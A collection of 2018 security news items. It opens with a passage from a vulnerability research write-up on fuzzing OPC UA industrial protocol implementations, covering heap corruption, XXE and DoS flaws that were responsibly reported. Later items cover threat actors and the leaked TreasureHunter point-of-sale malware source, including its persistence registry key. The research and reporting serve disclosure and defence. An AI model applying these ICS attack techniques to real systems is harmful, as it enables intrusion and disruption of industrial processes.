“Dumb” fuzzing, in spite of being called “dumb”, can be very useful and can in some cases significantly improve the chances of finding vulnerabilities. Developing a “smart” fuzzer for a specific program based on its logic and algorithms is time-consuming. At the same time, a “dumb” fuzzer helps quickly identify trivial vulnerabilities that can be hard to get at in the process of manual analysis, particularly when the amount of code to be analyzed is large, as was the case in our project.

The architecture of the OPC UA Stack makes in-memory fuzzing difficult. For the functions that we want to check for vulnerabilities to work correctly, the fuzzing process must involve passing properly formed arguments to the function and initializing global variables, which are structures with a large number of fields. We decided not to fuzz-test functions directly in memory. The fuzzer that we wrote communicated with the application being analyzed over the network.

The fuzzer’s algorithm had the following structure:

read input data sequences
perform a pseudorandom transformation on them
send the resulting sequences to the program over the network as inputs
receive the server’s response
repeat
After developing a basic set of mutations (bitflip, byteflip, arithmetic mutations, inserting a magic number, resetting the data sequence, using a long data sequence), we managed to identify the first vulnerability in uastack.dll. It was a heap corruption vulnerability, successful exploitation of which could enable an attacker to perform remote code execution (RCE), in this case, with NT AUTHORITY/SYSTEM privileges. The vulnerability we identified was caused by the function that handled the data which had just been read from a socket incorrectly calculating the size of the data, which was subsequently copied to a buffer created on a heap.

Upon close inspection, it was determined that the vulnerable version of the uastack.dll library had been compiled by the product’s developers. Apparently, the vulnerability was introduced into the code in the process of modifying it. We were not able to find that vulnerability in the OPC Foundation’s version of the library.

The second vulnerability was found in a .NET application that used the UA .NET Stack. While analyzing the application’s traffic in wireshark, we noticed in the dissector that some packets had an is_xml bit field, the value of which was 0. In the process of analyzing the application, we found that it used the XmlDocument function, which was vulnerable to XXE attacks for .NET versions 4.5 and earlier. This means that if we changed the is_xml bit field’s value from 0 to 1 and added a specially crafted XML packet to the request body (XXE attack), we would be able to read any file on the remote machine (out-of-bound file read) with NT AUTHORITY/SYSTEM privileges and, under certain conditions, to perform remote code execution (RCE), as well.

Judging by the metadata, although the application was part of the software package on the ICS that we were analyzing, it was developed by the OPC Foundation consortium, not the vendor, and was an ordinary discovery server. This means that other products that use the OPC UA technology by the OPC Foundation may include that server, making them vulnerable to the XXE attack. This makes this vulnerability much more valuable from an attacker’s viewpoint.

This was the first step in our research. Based on the results of that step, we decided to continue analyzing the OPC UA implementation by the OPC Foundation consortium, as well as products that use it.

OPC UA analysis
To identify vulnerabilities in the implementation of the OPC UA protocol by the OPC Foundation consortium, research must cover:

The OPC UA Stack (ANSI C, .NET, JAVA);
OPC Foundation applications that use the OPC UA Stack (such as the OPC UA .NET Discovery Server mentioned above);
Applications by other software developers that use the OPC UA Stack.
As part of our research, we set ourselves the task to find optimal methods of searching for vulnerabilities in all three categories.

Fuzzing the UA ANSI C Stack
Here, it should be mentioned that there is a problem with searching for vulnerabilities in the OPC UA Stack. OPC Foundation developers provide libraries that are essentially a set of exported functions based on a specification, similar to an API. In such cases, it is often hard to determine whether a potential security problem that has been discovered is in fact a vulnerability. To give a conclusive answer to that question, one must understand how the potentially vulnerable function is used and for what purpose – i.e., a sample program that uses the library is necessary. In our case, it was hard to make conclusions on vulnerabilities in the OPC UA Stack without looking at applications in which it was implemented.

What helped us resolve this problem associated with searching for vulnerabilities was open-source code hosted in the OPC Foundation’s repository on GitHub, which includes a sample server that uses the UA ANSI C Stack. We don’t often get access to product source code in the course of analyzing ICS components. Most ICS applications are commercial products, developed mostly for Windows and released with a licensing agreement the terms of which do not include access to the source code. In our case, the availability of the source code helped find errors both in the server itself and in the library. The UA ANSI C Stack source code was helpful for doing manual analysis of the code and for fuzzing. It also helped us find out whether new functionality had been added to a specific implementation of the UA ANSI C Stack.

The UA ANSI C Stack (like virtually all other products by the OPC Foundation consortium) is positioned as a solution that is not only secure, but is also cross-platform. This helped us our during fuzzing, because we were able to build a UA ANSI С Stack together with the sample server code published by the developers in their GitHub account, on a Linux system with binary source code instrumentation and to fuzz-test that code using AFL.

To accelerate fuzzing, we overloaded the networking functions –socket/sendto/recvfrom/accept/bind/select/… – to read input data from a local file instead of connecting to the network. We also compiled our program with AddressSanitizer.

To put together an initial set of examples, we used the same technique as for our first “dumb” fuzzer, i.e., capturing traffic from an arbitrary client to the application using tcpdump. We also added some improvements to our fuzzer – a dictionary created specifically for OPC UA and special mutations.

It follows from the specification of the binary data transmission format in OPC UA that it is sufficiently difficult for AFL to mutate from, say, the binary representation of an empty string in OPC UA (“\xff\xff\xff\xff”) to a string that contains 4 random bytes (for example, “\x04\x00\x00\x00AAAA”). Because of this, we implemented our own mutation mechanism, which worked with OPC UA internal structures, changing them based on their types.

After building our fuzzer with all the improvements included, we got the first crash of the program within a few minutes.

An analysis of memory dumps created at the time of the crash enabled us to identify a vulnerability in the UA ANSI C Stack which, if exploited, could result at least in a DoS condition.

Fuzzing OPC Foundation applications
Since, in the previous stage, we had performed fuzzing of the UA ANSI C Stack and a sample application by the OPC Foundation, we wanted to avoid retesting the OPC UA Stack in the process of analyzing the consortium’s existing products, focusing instead on fuzzing specific components written on top of the stack. This required knowledge of the OPC UA architecture and the differences between applications that use the OPC UA Stack.

The two main functions in any application that uses the OPC UA Stack are OpcUa_Endpoint_Create and OpcUa_Endpoint_Open. The former provides the application with information on available channels of data communication between the server and the client and a list of available services. The OpcUa_Endpoint_Open function defines from which network the service will be available and which encryption modes it will provide.

A list of available services is defined using a service table, which lists data structures and provides information about each individual service. Each of these structures includes data on the request type supported, the response type, as well as two callback functions that will be called during request preprocessing and post-processing (preprocessing functions are, in most cases, “stubs”). We included converter code into the request preprocessing function. It uses mutated data as an input, outputting a correctly formed structure that matches the request type. This enabled us to skip the application startup stage, starting an event loop to create a separate thread to read from our pseudo socket, etc. This enabled us to accelerate our fuzzing from 50 exec/s to 2000 exec/s.

As a result of using our “dumb” fuzzer improved in this way, we identified 8 more vulnerabilities in OPC Foundation applications.

Analyzing third-party applications that use the OPC UA Stack
Having completed the OPC Foundation product analysis stage, we moved on to analyzing commercial products that use the OPC UA Stack. From the ICS systems we worked with during penetration testing and analyzing the security status of facilities for some of our customers, we selected several products by different vendors, including solutions by global leaders of the industry. After getting our customers’ approval, we began to analyze implementations of the OPC UA protocol in these products.

When searching for binary vulnerabilities, fuzzing is one of the most effective techniques. In previous cases, when analyzing products on a Linux system, we used source code binary instrumentation techniques and the AFL fuzzer. However, the commercial products using the OPC UA Stack that we analyzed are designed to run on Windows, for which there is an equivalent of the AFL fuzzer called WinAFL. Essentially, WinAFL is the AFL fuzzer ported to Windows. However, due to differences between the operating systems, the two fuzzers are different in some significant ways. Instead of system calls from the Linux kernel, WinAFL uses WinAPI functions and instead of static source code instrumentation, it uses the DynamoRIO dynamic instrumentation of binary files. Overall, these differences mean that the performance of WinAFL is significantly lower than that of AFL.

To work with WinAFL in the standard way, one has to write a program that will read data from a specially created file and call a function from an executable file or library. Then WinAFL will put the process into a loop using binary instrumentation and will call the function many times, getting feedback from the running program and relaunching the function with mutated data as arguments. That way, the program will not have to be relaunched every time with new input data, which is good, because creating a new process in Windows consumes significant processor time.

Unfortunately, this method of fuzzing couldn’t be used in our situation. Owing to the asynchronous architecture of the OPC UA Stack, the processing of data received and sent over the network is implemented as call-back functions. Consequently, it is impossible to identify a data-processing function for each type of request that would accept a pointer to the buffer containing the data and the size of the data as arguments, as required by the WinAFL fuzzer.

In the source code of the WinAFL fuzzer, we found comments on fuzzing networking applications left by the developer. We followed the developer’s recommendations on implementing network fuzzing with some modifications. Specifically, we included the functionality of communication with the local networking application in the code of the fuzzer. As a result of this, instead of executing a program, the fuzzer sends payload over the network to an application that is already running under DynamoRIO.

However, with all our efforts, we were only able to achieve the fuzzing rate of 5 exec/s. This is so slow that it would take too long to find a vulnerability even with a smart fuzzer like AFL.

Consequently, we decided to go back to our “dumb” fuzzer and improve it.

We improved the mutation mechanism, modifying the data generation algorithm based on our knowledge of the types of data transferred to the OPC UA Stack.
We created a set of examples for each service supported (the python-opcua library, which includes functions for interacting with virtually all possible OPC UA services, proved very helpful in this respect).
When using a fuzzer with dynamic binary instrumentation to test multithreaded applications such as ours, searching for new branches in the application’s code is a sufficiently complicated task, because it is difficult to determine which input data resulted in a certain behavior of the application. Since our fuzzer communicated to the application over the network and we could establish a clear connection between the server’s response and the data sent to it (because communication took place within the limits of one session), there was no need for us to address this issue. We implemented an algorithm which determined that a new execution path has been identified simply when a new response that had not been observed before was received from the server.
As a result of the improvements described above, our “dumb” fuzzer was no longer all that “dumb”, and the number of executions per second grew from 1 or 2 to 70, which is a good figure for network fuzzing. With its help, we identified two more new vulnerabilities that we had been unable to identify using “smart” fuzzing.

Results
As of the end of March 2018, the results of our research included 17 zero-day vulnerabilities in the OPC Foundation’s products that had been identified and closed, as well as several vulnerabilities in the commercial applications that use these products.

We immediately reported all the vulnerabilities identified to developers of the vulnerable software products.

Throughout our research, experts from the OPC Foundation and representatives of the development teams that had developed the commercial products promptly responded to the vulnerability information we sent to them and closed the vulnerabilities without delays.

In most cases, flaws in third-party software that uses the OPC UA Stack were caused by the developers not using functions from the API implemented in the OPC Foundation’s uastack.dll library properly – for example, field values in the data structures transferred were interpreted incorrectly.

We also determined that, in some cases, product vulnerabilities were caused by modifications made to the uastack.dll library by developers of commercial software. One example is an insecure implementation of functions designed to read data from a socket, which was found in a commercial product. Notably, the original implementation of the function by the OPC Foundation did not include this error. We do not know why the commercial software developer had to modify the data reading logic. However, it is obvious that the developer did not realize that the additional checks included in the OPC Foundation’s implementation are important because the security function is built on them.

In the process of analyzing commercial software, we also found out that developers had borrowed code from OPC UA Stack implementation examples, copying that code to their applications verbatim. Apparently, they assumed that the ОРС Foundation has made sure that these code fragments were secure in the same way that it had ensured the security of code used in the library. Unfortunately, that assumption turned out to be wrong.

Exploitation of some of the vulnerabilities that we identified results in DoS conditions and the ability to execute code remotely. It is important to remember that, in industrial systems, denial-of-service vulnerabilities pose a more serious threat than in any other software. Denial-of-service conditions in telemetry and telecontrol systems can cause enterprises to suffer financial losses and, in some cases, even lead to the disruption and shutdown of the industrial process. In theory, this could cause harm to expensive equipment and other physical damage.

Conclusion
The fact that the OPC Foundation is opening the source code of its projects certainly indicates that it is open and committed to making its products more secure.

At the same time, our analysis has demonstrated that the current implementation of the OPC UA Stack is not only vulnerable but also has a range of significant fundamental problems.

First, flaws introduced by developers of commercial software that uses the OPC UA Stack indicate that the OPC UA Stack was not designed for clarity. Unfortunately, an analysis of the source code confirms this. The current implementation of the protocol has plenty of pointer calculations, insecure data structures, magic constants, parameter validation code copied between functions and other archaic features scattered throughout the code. These are features that developers of modern software tend to eliminate from their code, largely to make their products more secure. At the same time, the code is not very well documented, which makes errors more likely to be introduced in the process of using or modifying it.

Second, OPC UA developers clearly underestimate the trust software vendors have for all code provided by the OPC Foundation consortium. In our view, leaving vulnerabilities in the code of API usage examples is completely wrong, even though API usage examples are not included in the list of products certified by the OPC Foundation.

Third, we believe that there are quality assurance issues even with products certified by the OPC Foundation.

It is likely that use fuzz testing techniques similar to those described in this paper are not part of the quality assurance procedures used by OPC UA developers – this is demonstrated by the statistics on the vulnerabilities that we have identified.

The open source code does not include code for unit tests or any other automatic tests, making it more difficult to test products that use the OPC UA Stack in cases when developers of these products modify their code.

All of the above leads us to the rather disappointing conclusion that, although OPC UA developers try to make their product secure, they nevertheless neglect to use modern secure coding practices and technologies.

Based on our assessment, the current OPC UA Stack implementation not only fails to protect developers from trivial errors but also tends to provoke errors –we have seen this in real-world examples. Given today’s threat landscape, this is unacceptable for products as widely used as OPC UA. And this is even less acceptable for products designed for industrial automation systems.


Tech giant Telstra warns cloud customers they’re at risk of hack due to a SNAFU
11.5.2018 securityaffairs  Hacking

On May 4th Tech giant Telstra discovered a vulnerability in its service that could potentially expose customers of its cloud who run self-managed resources.
Telstra is a leading provider of mobile phones, mobile devices, home phones and broadband internet. On May 4th, the company has discovered a vulnerability in its service that could potentially expose users of its cloud who run self-managed resources.

Telstra told its users that their “internet facing servers are potentially vulnerable to malware or other malicious activity,” the experts from the company urge to “delete or disable” the “TOPS or TIRC account (privileged administrator accounts) on self-managed servers”.

Telstra managed resources

The company sent to users of self-managed servers a letter and advised customers of Telstra-managed servers that they’re in the clear.

“We’ve also taken steps to access your account and remove the TOPS or TIRC accounts to minimise the risk on your behalf,” reads the advisory issued by the company.

“We’re still encouraging you to check your account settings and remove/disable any unused accounts as we can’t confirm at this stage if we’ll be successful updating the accounts from our end.”

Experts speculate that TOPS and TIRC Telstra accounts are using default passwords, attackers can easily use them to access them.

“Our customers’ security is our number one priority. We identified a weakness, moved quickly to address it and worked closely with our customers to ensure the necessary steps were taken to fully secure their systems.” a Telstra spokesperson told El Reg.

At the time of writing, there are no info on the origin of the security issue.


Symantec Stock Plunges After Firm Announces Internal Probe
10.5.2018 securityweek IT

Symantec announced its fourth quarter and full year financial results on Thursday and while its revenue has increased, the cybersecurity firm’s stock dropped roughly 20% after it revealed that an internal investigation will likely delay its annual report to the U.S. Securities and Exchange Commission (SEC).

Symantec reported a Q4 GAAP revenue of $1.22 billion, which represents a 10% year-over-year increase, and $1.23 billion in non-GAAP revenue, an increase of 5% year-over-year.

As for the full fiscal year ended on March 30, GAAP revenue increased by 21% year-over-year to $4.84 billion, while non-GAAP revenue went up 19% to nearly $5 billion. The company said it had a cash flow of $950 million from operating activities for the fiscal year 2018.

Despite strong financial results, Symantec stock dropped from over $29 to less than $24 in after-hours trading after the company announced the launch of an internal investigation by the Audit Committee of the Board of Directors.

Few details have been made public by the company, but the probe was apparently triggered by concerns raised by a former employee.

“The Audit Committee has retained independent counsel and other advisors to assist it in its investigation. The Company has voluntarily contacted the Securities and Exchange Commission to advise it that an internal investigation is underway, and the Audit Committee intends to provide additional information to the SEC as the investigation proceeds. The investigation is in its early stages and the Company cannot predict the duration or outcome of the investigation,” Symantec said.

The security firm believes it’s unlikely that it will be able to file its annual 10-K report with the SEC in a timely manner due to the investigation.

In response to news of the internal probe, investor rights law firm Rosen Law Firm announced the preparation of a class action to recover losses suffered by Symantec investors. Rosen says it’s investigating allegations that Symantec “may have issued materially misleading business information to the investing public.”


Many Vulnerabilities Found in OPC UA Industrial Protocol
10.5.2018 securityweek
Vulnerebility

Researchers at Kaspersky Lab have identified a significant number of vulnerabilities in the OPC UA protocol, including flaws that could, in theory, be exploited to cause physical damage in industrial environments.

Developed and maintained by the OPC Foundation, OPC UA stands for Open Platform Communications Unified Automation. The protocol is widely used in industrial automation, including for control systems (ICS) and communications between Industrial Internet-of-Things (IIoT) and smart city systems.

Researchers at Kaspersky Lab, which is a member of the OPC Foundation consortium, have conducted a detailed analysis of OPC UA and discovered many vulnerabilities, including ones that can be exploited for remote code execution and denial-of-service (DoS) attacks.OPC Foundation patches 17 vulnerabilities in OPC UA protocol

There are several implementations of OPC UA, but experts focused on the OPC Foundation’s implementation – for which source code is publicly available – and third-party applications using the OPC UA Stack.

A total of 17 vulnerabilities have been identified in the OPC Foundation’s products and several flaws in commercial applications that use these products. Most of the issues were discovered through fuzzing.

Exploitation of the vulnerabilities depends on how the targeted network is configured, but in most cases, it will require access to the local network, Kaspersky researchers Pavel Cheremushkin and Sergey Temnikov told SecurityWeek in an interview at the company’s Security Analyst Summit in March. The experts said they had never seen a configuration that would allow attacks directly from the Internet.

An attacker first has to identify a service that uses OPC UA, and then send it a payload that triggers a DoS condition or remote code execution. Remote code execution vulnerabilities can be leveraged by attackers to move laterally within the network, control industrial processes, and to hide their presence. However, DoS attacks can have an even more significant impact in the case of industrial systems.

“In industrial systems, denial-of-service vulnerabilities pose a more serious threat than in any other software,” Cheremushkin and Temnikov wrote in a report published on Thursday. “Denial-of-service conditions in telemetry and telecontrol systems can cause enterprises to suffer financial losses and, in some cases, even lead to the disruption and shutdown of the industrial process. In theory, this could cause harm to expensive equipment and other physical damage.”

All the security holes were reported to the OPC Foundation and their respective developers and patches were released. Applying the patches is not difficult considering that the OPC Stack is a DLL file and updates are performed simply by replacing the old file with the new one.

The OPC Foundation has released advisories for the security holes discovered by Kaspersky researchers, but grouped all the issues under two CVE identifiers: CVE-2017-17433 and CVE-2017-12069. The latter also impacts automation and power distribution products from Siemens, which has also published an advisory.

“Based on our assessment, the current OPC UA Stack implementation not only fails to protect developers from trivial errors but also tends to provoke errors – we have seen this in real-world examples. Given today’s threat landscape, this is unacceptable for products as widely used as OPC UA. And this is even less acceptable for products designed for industrial automation systems,” researchers said.


Industry Reactions to Iran Cyber Retaliation Over U.S. Nuclear Deal Exit
10.5.2018 securityweek Cyber

President Donald Trump announced this week that the U.S. is withdrawing from the Iran nuclear deal and reimposing sanctions on the Middle Eastern country. Many experts fear that Iran will retaliate by launching cyberattacks on Western organizations.

Industry professionals contacted by SecurityWeek all say that there is a strong possibility of attacks, but they mostly agree that Iran will likely not try to cause too much damage as that could lead to massive response from the United States and its allies.

And the feedback begins...

Ross Rustici, senior director, intelligence services, Cybereason:

“Iran is currently in a precarious position, any disproportionate retaliation risks alienating the European community that is currently aligned with continued sanctions relief in exchange for IAEA inspections. Compounding that with the fact the Iran's domestic situation has degraded over the last several years a result of its intervention in the broader Middle East and its proxy war with Saudi Arabia, leaves Iran's leadership needing to be very careful with how directly it confronts the United States on this issue.

In the near term Iran is most likely going to take a wait and see approach to the decertification of the deal by Trump. If sanctions are imposed on Iran and it serves to cause significant economic harm though rigorous enforcement, then Iran will probably seek to retaliate in a fashion similar to what the US experienced in 2013 with the DDoS attacks against the financial sector. Despite the Iranian cyber program maturing significantly in the past five years, they will focus on a proportional response to whatever sanctions regime is levied against them. Disruptions that cause financial loss rather that destruction is where the regime is likely to go first. Iran is only likely to use significant destructive capabilities if the situation escalates or the US expands its role in supporting Saudi Arabia.

Given Iran's growth over the last five years in the cyber domain, I would expect them to at least be initially successful against civilian targets in the US should they decide to go that route. From a technical perspective they have more than enough capability to carry out successful attacks, as we have seen in the Middle East and the United States. If private sector networks are left to their own defences, Iran will have a high success rate. The thing that will reduce their operational capacity is if the US government takes a proactive and aggressive counter cyber posture and actively disrupts Iran's program before an attack is launched. While this would greatly hamper Iran's efforts it would not eliminate them completely and it would also be an escalation that could result in Iran taking more destructive measures because they have less options and control.”

Priscilla Moriuchi, Director of Strategic Threat Development, Recorded Future:

“President Trump’s actions have placed American businesses at increased risk for retaliatory and destructive cyber attacks by the Islamic Republic. We assess that within months, if not sooner, American companies in the financial, critical infrastructure, oil, and energy sectors will likely face aggressive and destructive cyber attacks by Iranian state-sponsored actors.

Further, our research indicates that because of the need for a quick response, the Islamic Republic may utilise contractors that are less politically and ideologically reliable (and trusted) and as a result, could be more difficult to control. It is possible that this dynamic could limit the ability of the government to control the scope and scale of these destructive attacks once they are unleashed.”

Phil Neray, VP of Industrial Cybersecurity, CyberX:

“Cyber is an ideal mechanism for weaker adversaries like Iran because it allows them to demonstrate strength on the global stage without resorting to armed conflict. I expect that Iran will continue to escalate its cyberattacks on US targets but will keep them below the threshold that would require a kinetic response from the US.

TRITON shows that Iran has the skills to launch damaging attacks on critical infrastructure. However, for now they confine these attacks to Middle Eastern targets in the same way that Russia has so far only shut down the power grid in the Ukraine. We should expect Iran to conduct phishing and cyber espionage attacks against US-based industrial and critical infrastructure firms -- as we've seen with Russian threat actors -- with the goal of establishing footholds in OT networks that could later be used for more destructive attacks.”

Gen. Earl Matthews, senior vice president and chief strategy officer, Verodin:

“The Iranians continue to improve and have become more sophisticated with their cyber capabilities. In my opinion, they are in the top 5 of countries with significant capabilities. We will definitely see increased cyber activity as a result of the US backing out of the nuclear agreement. Attacks not only against the US but many of our allies, especially Israel.

Iran has previously attacked our financial institutions with Denial of Service and most recently penetrated a number of universities. The latest attacks represented the continued loss of intellectual property of our nation. It wouldn’t surprise me if many of these universities were specifically targeted because they are doing research and development on behalf of the US Government.

Iran most certainly has the capability of launching significant attacks but I would view that probability to be low. They will continue to pursue softer targets where common means of access will be through social engineering and penetrate organizations with weak cyber hygiene. These attacks can be mitigated if organizations continuously automated and measured the validity, value, and effectiveness of their cybersecurity controls. We are well beyond the checklist compliance and thinking we are safe.”

John Hultquist, Director of Intelligence Analysis, FireEye:

“Iranian actors remain among the most aggressive we track, carrying out destructive and disruptive attacks in addition to stealthier acts of cyber espionage. Prior to the nuclear agreement, Iranian actors carried out several attacks against the West. There were also clear signs these actors were probing Western critical infrastructure in multiple industries for future attack. These efforts did not entirely disappear with the agreement, but they did refocus on Iran’s neighbors in the Middle East. With the dissolution of the agreement, we anticipate that Iranian cyberattacks will once again threaten Western critical infrastructure.”

Sherban Naum, senior vice president for corporate strategy and technology, Bromium:

“The premise that Iran can or will increase their attacks is predicated on both their existing computer network attack practices and risk tolerance to potential retaliation. The regime may see a need to show strength internally and take action. They will have to balance the time and resources dedicated to increase offensive efforts with the need to shore up defensive efforts due to the increased conflicts in the region from regional actors as well a potential retaliation by those that they attack.

[...]

There are three possible areas they could focus: Critical infrastructure, a doxxon like attack looking to shame those involved with the reversal decision and the third being in region actors and their weapons systems.

[...]

The questions to ask are what would motivate their taking action and their acceptable outcomes. Taking action, putting lives at risk could result in a kinetic response from the US and/or its allies as well as put into question Europe’s current support of the agreement. If they were to take out a power station and a hospital loses power, they lose the PR war and retaliation from the US is quite plausible. At this point, they want to show the world they are going to continue down the path of adhering to the nuclear agreement, that they are the ones targeted and have so much to lose. They would be better off influencing Europe to play into their hands as it could suit their economic needs and try to influence their own social media movement.”

Robert Lee, CEO, Dragos:

“ICS cyber attacks and espionage can be highly geopolitical in nature. Every time we see increased tension between states we expect to see a rise in ICS targeting, this does not mean we expect to see attacks. In this case, activity moves beyond conducting early reconnaissance to gaining access to infrastructure companies and stealing information that could be used at a later date. However simply having access to the information does not mean an attack is easy or imminent. Avoiding such tension while also defending against such aggressive efforts is the goal.”

Sanjay Beri, CEO & Founder of Netskope:

“While the repercussions of the United States pulling out of the Iran nuclear deal will be wide reaching, one of the first places you can expect to see a response is cyberspace. Nation-states, including Iran, have historically used cyberattacks as a low-risk, high-reward tactic for retaliating to political opposition. We saw this with North Korea in the form of the Sony hack, and Iran’s attack against US banks following Stuxnet.

The U.S. needs cybersecurity leadership today more than ever if we are to stand a chance at defending the country from nation-state sponsored cyber attacks. Forming a cohesive cyber defense strategy has become nearly impossible as hundreds of departments report into a siloed set of decision makers. There’s no silver bullet, but appointing a federal CISO to oversee all of our nation’s cybersecurity initiatives and promote inter-agency collaboration would be a big step in the right direction.”

Willy Leichter, Vice President of Marketing, Virsec:

“It seems likely that a deteriorating relationship between the US and Iran will lead to more cyberattacks. There have been numerous reports about state-sponsored hacking groups in Iran including APT33 that have already targeted critical infrastructure in Saudi Arabia, South Korea, and the US. These hacking groups have access to advanced tools (many leaked from the NSA through the Shadow Brokers) to launch attacks that corrupt legitimate processes and memory, and have proved adept at creating multiple variants of these exploits. We need to expect ongoing cyber warfare to be the new normal, and it’s critical that all organizations take security much more seriously, improve their detection and protection capabilities, and train all employees to protect their credentials against theft.”

Andrew Lloyd, President, Corero Network Security:

“Given multiple reports implicating the Iranian government in the cyber-attack on the Saudi petrochemical plant, the prospect of cyber-retribution for the US withdrawal certainly exists. Also, it’s well worth remembering that even if a nation doesn't have well developed cyberwarfare resources, there’s plenty of bad actors on the global stage who are more than happy to launch attacks against the foes of anyone who’s willing to pay. Moreover, the irony is that such bad actors are able to leverage the exploits that major forces such as the US government have themselves developed and which subsequently leaked across the Dark Web’s darker commercial corners. For example, it’s well reported that groups such as the Shadow Brokers have released and brokered tools from the NSA.

Also, basic and advanced DDoS-for-hire services abound, as we’ve seen in recent weeks and months. This all underscores the fact that all operators of essential services (and especially, critical national infrastructure) must up their game when it comes to DDoS defences. Ironically, today is the day that the EU NIS Directive becomes law in all 28 EU Member States.”


Cyber Insurance Startup At-Bay Raises $13 Million
10.5.2018 securityweek IT

Cyber insurance firm At-Bay announced this week that it has raised $13 million in Series A funding, which brings the company’s total funding to $19 million.

The Mountain View, Calif-based company emerged from stealth in November 2017 with a mission to shake up the status quo in cyber insurance.

At-Bay brings a new model of security cooperation between insured and insurer to reduce risk and exposure to both parties.

"We will be collecting data and using researchers to push the limits of our understanding of risk," Rotem Iram, CEO and founder of At-Bay, previously told SecurityWeek. "As we do that, we will be improving the quality of our product. Product quality is depressed today because insurance companies do not really understand the cybersecurity risk.”

The Series A funding round was co-led by Keith Rabois of Khosla Ventures, Yoni Cheifetz of Lightspeed, and Shlomo Kramer.

"Cyber insurance is one of the fastest growing and complex markets, yet the incumbents are still currently relying on standardized checklists and irrelevant actuarial data to model risk. At-Bay is focusing on customized and real-time risk modeling and risk reduction for its customers which unlocks superior pricing and coverage options for them," said Keith Rabois, general investment partner at Khosla Ventures.

The company said the new round of financing will help accelerate development of its proactive cyber security monitoring service and roll out its insurance products.


Allanite threat actor focused on critical infrastructure is targeting electric utilities and ICS networks
10.5.2018 securityaffairs ICS

Security experts from the industrial cybersecurity firm Dragos warn of a threat actor tracked as Allanite has been targeting business and industrial control networks at electric utilities in the United States and the United Kingdom.
Dragos experts linked the campaigns conducted by the Dragonfly APT group and Dymalloy APT, aka Energetic Bear and Crouching Yeti, to a threat actors they tracked as ‘Allanite.’

Allanite APTAllanite has been active at least since May 2017 and it is still targeting both business and ICS networks at electric utilities in the US and UK.

Experts believe the APT group is conducting reconnaissance and gathering intelligence for later attacks.

Dragos, Inc.
@DragosInc
Today, we're unveiling a public dashboard of ICS-focused activity groups that aim to exploit, disrupt, and potentially destroy industrial systems. Each week this month, we'll release new content discussing these adversary details that you can read here: https://dragos.com/adversaries.html …

4:53 PM - May 3, 2018
121
83 people are talking about this
Twitter Ads info and privacy
For those that are unaware of Dymalloy APT, the threat actor was discovered by Dragos researchers while investigating the Dragonfly’s operations. The Dragonfly APT group is allegedly linked to Russian intelligence and it is believed to be responsible for the Havex malware.

According to the researchers, the TA17-293A alert published by the DHS in October 2017 suggests a link between Dragonfly attacks with Allanite operations

Dragos experts highlighted that Allanite operations present similarities with the Palmetto Fusion campaign associated with Dragonfly by the DHS in July 2017.

At the same time, the experts believe the threat actor is different from Dragonfly and Dymalloy.

Like Dragonfly and Dymalloy, Allanite hackers leverage spear phishing and watering hole attacks, but differently from them, they don’t use any malware.

Is Allanite a Russia-linked threat actor?

Many security experts linked the APT group to Russia, but Dragos researchers did not corroborate the same thesis.

According to the Dragos, the hackers harvest information directly from ICS networks in campaigns conducted in 2017.

At the time the group has never hacked into a system to cause any disruption or damage.

The report published by Dragos on the Allanite APT is the first analysis of a collection of related to threat groups targeting critical infrastructure.

Summary info on threat actors will be made available through an Activity Groups dashboard, but users interested in the full technical report need to pay it.


The source code of the TreasureHunter PoS Malware leaked online

10.5.2018 securityaffairs Virus

Security experts at Flashpoint confirmed the availability online for the source code of the TreasureHunter PoS malware since March.
The researchers found evidence that the threat has been around since at least late 2014. TreasureHunt was first discovered by researchers at the SANS Institute who noticed the malware generating mutex names to evade detection.

TreasureHunt enumerates the processes running on the infected systems and implement memory scraping functions to extract credit and debit card information. Stolen payment card data are sent to C&C servers through HTTP POST requests.

The experts at FireEye believe who analyzed the malware back in 2016, discovered that cyber criminals compromised the PoS systems by using stolen or weak credentials. Once the TreasureHunt malware infects the systems, it installs itself in the “%APPDATA%” directory and maintains persistence by creating the registry entry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jucheck
Flashpoint experts discovered the source code of TreasureHunter on a top-tier Russian-speaking forum, the guy who posted the code also leaked the source code for the graphical user interface builder and administrator panel.

The original developer of the PoS malware appears to be a Russian speaker who is proficient in English.

“The source code for a longstanding point-of-sale (PoS) malware family called TreasureHunter has been leaked on a top-tier Russian-speaking forum. Compounding the issue is the coinciding leak by the same actor of the source code for the malware’s graphical user interface builder and administrator panel.” reads the analysis published by Flashpoint.

“The availability of both code bases lowers the barrier for entry for cybercriminals wishing to capitalize on the leaks to build their own variants of the PoS malware.”

Cybercriminals could take advantage of the availability of the above code bases to create their own version of the TreasureHunter PoS malware, according to the experts, the number of attacks leveraging this threat could rapidly increase.

The actor behind the TreasureHunter leak said: “Besides alina, vskimmer and other sniffers, Treasure Hunter still sniffs ( not at a very high rate, but it still does ) and besides that , since now you have the source code, it can be update anytime for your own needs.”

The good news is that that availability of the source code could allow security firms to analyze the threat and take the necessary countermeasures.

Flashpoint proactively collaborated with researchers at Cisco Talos to prevent the diffusion of the malicious code.

“In the meantime, Russian-speaking cybercriminals have been observed on the vetted underground discussing improvements and weaponization of the leaked TreasureHunter source code,” continues the analysis.

“Originally, this malware appears to have been developed for the notorious underground shop dump seller “BearsInc,” who maintained presence on various low-tier and mid-tier hacking and carding communities (below is a graphical representation of such an operation on the Deep & Dark Web). It’s unknown why the source code was leaked at this time.”

TreasureHunter PoS Malware

The malicious code is written in pure C, it doesn’t include C++ features, and was originally compiled in Visual Studio 2013 on Windows XP.

The code project appears to be called internally trhutt34C, according to the researchers the author was working to improve it by redesign several features, including anti-debugging, code structure, and gate communication logic.

“The source code is consistent with the various samples that have been seen in the wild over the last few years. TreasureHunter\config.h shows definite signs of modification over the lifespan of the malware.” concluded the analysis.

“Early samples filled all of the configurable fields with FIELDNAME_PLACEHOLDER to be overwritten by the builder. More recent samples, and the source code, instead writes useful config values directly into the fields. This makes the samples slightly smaller and uses fresh compiles to create reconfigured files.”


TreasureHunter PoS Malware Source Code Leaked Online
10.5.2018 securityweek
Virus

New variants of the TreasureHunter point-of-sale (PoS) malware are expected to emerge after its source code was leaked online in March, Flashpoint warns.

Capable of extracting credit and debit card information from processes running on infected systems, the PoS malware family has been around since at least 2014. To perform its nefarious activities, it scans all processes on the machine to search for payment card data, and then sends the information to the command and control (C&C) servers.

The malware’s source code was posted on a top-tier Russian-speaking forum by an actor who also leaked the source code for the malware’s graphical user interface builder and administrator panel.

